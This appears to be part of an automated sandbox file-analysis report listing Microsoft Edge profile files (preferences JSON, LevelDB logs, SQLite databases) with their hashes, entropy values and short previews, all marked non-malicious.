                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):13342
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.280059902308109
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:stQJ99QTryDiuabatSuypmV7sb9FIa340ybkRRb85nbV+FiwQA4ff7NIyPZYJ:stQPGQSu4mpsb9FXxabGxQxff7NI5
                                                                                                                                                                                                                                                                                                                  MD5:324B34BE3A84B81E3E1ECB356CDE045D
                                                                                                                                                                                                                                                                                                                  SHA1:16B250CE1711C3986C4F784D5FD7B8324327260D
                                                                                                                                                                                                                                                                                                                  SHA-256:A9E0F65FFDA20BFF10AAF59CB278F021C8CEC2F35E0CC4D48138EEC40AB1199D
                                                                                                                                                                                                                                                                                                                  SHA-512:484690DB56066225C7F44B3A15780EABC23A70556A34C91E02EF32F235A4C05AABF1C3229EA93CD77F81001F4C70865279C49CA6AB6F96E89A4582D043F28D03
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40470
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.561339271051783
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:y6dPRl7pLGLPpjWPFuM/fWa8F1+UoAYDCx9Tuqh0VfUC9xbog/OVZ7NmzLYrwy2W:y6dPRzcPpjWPIWfWau1jaM7NKLJy2Ja1
                                                                                                                                                                                                                                                                                                                  MD5:879C7A14EE5170CA84F41D47FD2A1097
                                                                                                                                                                                                                                                                                                                  SHA1:970EE5F492971E47C3242AF212CE6407D6243DB0
                                                                                                                                                                                                                                                                                                                  SHA-256:1CEC1092CE957B94A00B80784436D07F39584A6268A5F18931E7053B94EBA9C4
                                                                                                                                                                                                                                                                                                                  SHA-512:4D706708971CF4F730775EC4D9EFE863860A196F865DA3483879E5F463B3EDF61158F118CB52FC43DA3BFC42A1F013C25614BDA24C23978819E28EEC110A8F60
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):12584
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.209102247326729
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:stQJ99QTryDiuabatSuypmV7sb9FIa34HkRRb85nbV+FiwQA4nq7NIyPZYJ:stQPGQSu4mpsb9FXwbGxQxq7NI5
                                                                                                                                                                                                                                                                                                                  MD5:BF59E2882EB567E2EFF7978345250018
                                                                                                                                                                                                                                                                                                                  SHA1:58DE1F02F65A480C9C916917D22B0C1C4A81FA42
                                                                                                                                                                                                                                                                                                                  SHA-256:77B1C718622BCB7D6150974124FE11C06633EC6E0D333FEFD8401B3A9DE82416
                                                                                                                                                                                                                                                                                                                  SHA-512:239A634B5EE5A9A1C95C988C63FB45C436D1E78DF6474B2AE3BC76BC49196C18340852BA83B4B9F282AA6004604834506D7639CDFE06B9063FFCA3FA468C4BDF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376674109197488","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                                  MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                                  SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                                  SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                                  SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):309
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.245264032511766
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEgQtRsFB1CHhJ23oH+Tcwtp3hBtB2KLlVEgl6UtM+q2PCHhJ23oH+Tcwtp3hBWq:k1sfYebp3dFLscM+vBYebp3eFUv
                                                                                                                                                                                                                                                                                                                  MD5:3C04158EC6BDDE8EB7A4A71603917A18
                                                                                                                                                                                                                                                                                                                  SHA1:BABB63E700FB4314F2BE427E41A5A7114225DAFD
                                                                                                                                                                                                                                                                                                                  SHA-256:8B491213E1DC0AE708D942F9E7D37C9D0B5503F094E90468CD9E72DFFBE56C1E
                                                                                                                                                                                                                                                                                                                  SHA-512:12DC00E6C50F8050118E079DF9D859585EE7928512D3368D9E1AE8674D0AEE72C4C235020941C1680A0DAA83CE43BAB6B2E0196ED5E5767E2BFC37CAA507D1D3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:34.109 148c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/11/21-09:48:34.401 148c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):1764710
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.13809913149446
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:hKPSfKfgXaHbMhFQlmADAbpENUdifYOBHbc2r:hKafqJmcx
                                                                                                                                                                                                                                                                                                                  MD5:A954BBC0EBEBF6939D639FDA79026F1F
                                                                                                                                                                                                                                                                                                                  SHA1:E56EB63202564A762CF8F6E441E6DC9854C5D945
                                                                                                                                                                                                                                                                                                                  SHA-256:040DA7B9EED73E20028148E497600D0A9A1936F7C4C6D6C42E5D36F5630E39C8
                                                                                                                                                                                                                                                                                                                  SHA-512:B7AC99AD8C160D88FF032CEB4E9EAF742FD6437C1F17CB4630E0EA47A85ABF14C20CDD8DA9818EE9D76BF96FF43F3B5D3E5E1DFC4F99F3DE27E5AC70EFA7EC1F
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1.Go..................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340967444415546.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):333
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.159466128314398
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEg2Nlyq2PCHhJ23oH+Tcwt9Eh1tIFUt8YEg2uj1Zmw+YEgg1RkwOCHhJ23oH+TI:kLbyvBYeb9Eh16FUt8/LuJ/+/b1R56Yf
                                                                                                                                                                                                                                                                                                                  MD5:A6482CFD9A9A18D8028D4DF26715A688
                                                                                                                                                                                                                                                                                                                  SHA1:7E71B7D6ADF4BDF743BCA7B0C11677AD9C1B6C86
                                                                                                                                                                                                                                                                                                                  SHA-256:B984FE30AA42E6F80E783B8D9E18C5BE2132E8E83461D4632A98C222D975E7EF
                                                                                                                                                                                                                                                                                                                  SHA-512:FACBFBCE49507B29CD3783FA8C664A5F15B00AC8EFBB30BE5C1435076A986E9B686B1D5D8C619E0FDBDD8217D321AD91403A4E3622230475421D82C16200FDA1
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:34.305 814 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/11/21-09:48:34.306 814 Recovering log #3.2024/11/21-09:48:34.314 814 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.46255849841369756
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBuk2UtW:TouQq3qh7z3bY2LNW9WMcUvBuk2Ut
                                                                                                                                                                                                                                                                                                                  MD5:984C6E19845497F21064F88C484D3C60
                                                                                                                                                                                                                                                                                                                  SHA1:4B951EA99E7930ECC83BA4FBCD09A71E2CFCB40E
                                                                                                                                                                                                                                                                                                                  SHA-256:F7008CEA5E317501766B916D346D492ADD6AADD7F48DF3F11FCAFB188257AECD
                                                                                                                                                                                                                                                                                                                  SHA-512:4E9DA9570B1EFCA4261FD3724DBFC122A17AEECF4869768A8F175F376FD4F6A613F778EEFF015D29361C0A3740D8CA42AF79CCAEAEE9D22D4B7672B88A3D7B50
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):348
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.213877783561148
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEyGIq2PCHhJ23oH+TcwtnG2tMsIFUt8YEp4XZmw+YEp4FkwOCHhJ23oH+TcwtnB:kyGIvBYebn9GFUt8/p4X/+/p4F56YebB
                                                                                                                                                                                                                                                                                                                  MD5:68F74A1EC952FEFF285BED6FD7651927
                                                                                                                                                                                                                                                                                                                  SHA1:C5968990C27BF220AFA326ECCB8C0485D0B65B23
                                                                                                                                                                                                                                                                                                                  SHA-256:60FAF39C92F2B00352425E8A42D3B7B2C5E61F97EB385ECF05CB361B26D33BEC
                                                                                                                                                                                                                                                                                                                  SHA-512:AE6DF000DF399A17C468B2422975B8DC317F2EF4ED459CD4A13A7AB88C89A71245EAAE9CCD7E35D4960E7BBF9C98FB0B7C9407FD69E70F28AE23015D5778ADEE
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:28.832 1ac4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/11/21-09:48:28.833 1ac4 Recovering log #3.2024/11/21-09:48:28.833 1ac4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6128180873828298
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jdIp/J4mL:TO8D4jJ/6Up+4
                                                                                                                                                                                                                                                                                                                  MD5:AB44AB76320A251885C6D6474A892498
                                                                                                                                                                                                                                                                                                                  SHA1:230BC92419A67FA32FCACF8F5B26D2D6D464495D
                                                                                                                                                                                                                                                                                                                  SHA-256:4087FEC39F09FB62C89630B067685D84B28E6D1E378F3E7572F956863BD6DE3C
                                                                                                                                                                                                                                                                                                                  SHA-512:0186DB43491AF05D80AA33F0331F41113D310E267D263A45CB64E9546292142382C3FBCBCAAD203963DC75D9F8B5C5FBD2847CF926209E473DFC972343AC6E90
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):375520
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.354138497876316
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:IA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:IFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                                  MD5:2FC23476801E2BE716E1BB90B5F995A5
                                                                                                                                                                                                                                                                                                                  SHA1:CA5F77E3F878FE65099D08B31B50B400F3FAC0F6
                                                                                                                                                                                                                                                                                                                  SHA-256:8C840BA63C70862606EBA85ADA26470D6596A2464363C0F7E168C80721E46D39
                                                                                                                                                                                                                                                                                                                  SHA-512:38AA3A2C55725A171B0D574298B36BCF9FC036C18F57ED1C6944371645E57AF600A5B8ABAD74A19C0F24513EC22A08DF8919D2F51F3C7F38CC66872DD4352A12
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):309
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.2093172094700275
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEgwrR1CHhJ23oH+Tcwtk2WwnvB2KLlVEgh1Vq2PCHhJ23oH+Tcwtk2WwnvIFUv:k1NYebkxwnvFLsmVvBYebkxwnQFUv
                                                                                                                                                                                                                                                                                                                  MD5:13BE837BDF173C36639C03EFDA2E5AA1
                                                                                                                                                                                                                                                                                                                  SHA1:5EDDBD1EA1EC1F6BDA7501D2E0C4AD2A656E48EE
                                                                                                                                                                                                                                                                                                                  SHA-256:CDDFD440B8686DDE02427B851B77784CB23DC3264B80B44559C8339627EDDAEA
                                                                                                                                                                                                                                                                                                                  SHA-512:E1574C67BAA615699D0319A431C3A24CFD1E10D0927D5D2CA2F1F55FC9BF5C56D0830F7C9B111051A0DCB675BE8BFA809DA8696B3BD5BF619FF23AC1C488CC64
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:34.365 de0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/21-09:48:34.396 de0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):358860
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.324607004021109
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rz:C1gAg1zfv7
                                                                                                                                                                                                                                                                                                                  MD5:DEA3EC7B4730365162FA1E36099AB72C
                                                                                                                                                                                                                                                                                                                  SHA1:A497314A2CEFE6B7756E9487709ECAF429CDA603
                                                                                                                                                                                                                                                                                                                  SHA-256:D1634D121FD7B4AE1D4BA5FEC8CD6CE6BD1D5FCE0C2B31B901F5571FF3300706
